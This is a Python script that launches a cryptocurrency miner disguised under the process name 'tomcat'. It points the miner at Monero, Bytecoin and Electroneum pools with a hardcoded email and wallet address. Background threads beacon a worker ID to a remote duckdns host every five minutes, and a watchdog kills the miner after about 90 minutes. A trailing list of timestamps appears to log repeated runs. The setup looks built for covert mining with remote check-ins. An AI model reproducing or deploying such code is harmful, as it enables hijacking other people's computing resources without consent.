import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:08.673145
#2018-02-17 16:53:07.483625
#2018-02-17 18:42:07.037702
#2018-02-17 20:32:07.223674
#2018-02-17 22:18:06.738574
#2018-02-18 00:02:05.236573
#2018-02-18 01:52:04.748572
#2018-02-18 03:40:01.342891
#2018-02-18 05:26:07.263491
#2018-02-18 07:18:03.660513
#2018-02-18 09:06:03.784231
#2018-02-18 10:52:06.198929
#2018-02-18 12:39:03.891155
#2018-02-18 14:26:04.272572
#2018-02-18 16:16:06.356067
#2018-02-18 18:04:06.399374
#2018-02-18 19:51:06.757740
#2018-02-18 21:39:07.244919
#2018-02-18 23:27:01.393078
#2018-02-19 01:14:07.324340
#2018-02-19 03:02:05.148716
#2018-02-19 04:48:03.453745
#2018-02-19 06:34:04.040090
#2018-02-19 08:23:05.927016
#2018-02-19 10:13:08.085170
#2018-02-19 12:01:02.158896
#2018-02-19 13:47:10.432401
#2018-02-19 15:36:09.382024
#2018-02-19 17:24:01.971906
#2018-02-19 19:13:04.264034
#2018-02-19 20:59:03.996661
#2018-02-19 22:46:06.802724
#2018-02-20 00:31:05.573485
#2018-02-20 02:19:07.083968
#2018-02-20 04:09:06.067049
#2018-02-20 05:51:07.304337
#2018-02-20 07:37:01.536423
#2018-02-20 09:21:01.702284
#2018-02-20 11:04:09.577477
#2018-02-20 12:51:04.485454
#2018-02-20 14:36:09.015070
#2018-02-20 16:20:07.874288
#2018-02-20 18:07:09.646968
#2018-02-20 19:57:08.420626
#2018-02-20 21:46:01.642507
#2018-02-20 23:27:04.345355
#2018-02-21 01:11:07.162893
#2018-02-21 02:57:08.553037
#2018-02-21 04:45:05.299695
#2018-02-21 06:31:05.953753
#2018-02-21 08:16:05.636462
#2018-02-21 10:02:04.530881
#2018-02-21 11:51:07.851166
#2018-02-21 13:43:04.619503
#2018-02-21 15:27:09.941116
#2018-02-21 17:17:06.514373
#2018-02-21 19:06:01.308004
#2018-02-21 20:52:09.115423
#2018-02-21 22:38:05.013814
#2018-02-22 00:26:05.785965
#2018-02-22 02:16:04.150533
#2018-02-22 04:02:01.836021
#2018-02-22 05:47:07.341666
#2018-02-22 07:33:02.064170
#2018-02-22 09:21:01.763097
#2018-02-22 11:06:08.786613
#2018-02-22 12:53:06.247155
#2018-02-22 14:38:11.153269
#2018-02-22 16:24:07.154754
#2018-02-22 18:12:09.851355
#2018-02-22 20:02:07.114225
#2018-02-22 21:52:05.896852
#2018-02-22 23:39:01.701913
#2018-02-23 01:26:01.907249
#2018-02-23 03:12:01.480384
#2018-02-23 04:58:03.998778
#2018-02-23 06:42:03.703191
#2018-02-23 08:32:06.640622
#2018-02-23 10:46:01.575044
#2018-02-23 12:42:09.269393
#2018-02-23 14:25:04.694586
#2018-02-23 16:17:05.822403
#2018-02-23 18:04:08.204205
#2018-02-23 19:49:07.379663
#2018-02-23 21:33:05.501391
#2018-02-23 23:21:05.487058
#2018-02-24 01:11:04.219021
#2018-02-24 03:02:05.130594
#2018-02-24 04:48:05.244238
#2018-02-24 06:33:04.495366
#2018-02-24 08:21:07.340163
#2018-02-24 10:05:08.987977
#2018-02-24 12:03:05.059766
#2018-02-24 13:50:08.637593
#2018-02-24 15:30:07.030550
#2018-02-24 17:21:03.380824
#2018-02-24 19:10:06.656201
#2018-02-24 20:58:06.330581
#2018-02-24 23:26:04.276179
#2018-02-25 03:47:03.918690
#2018-02-25 07:32:04.385530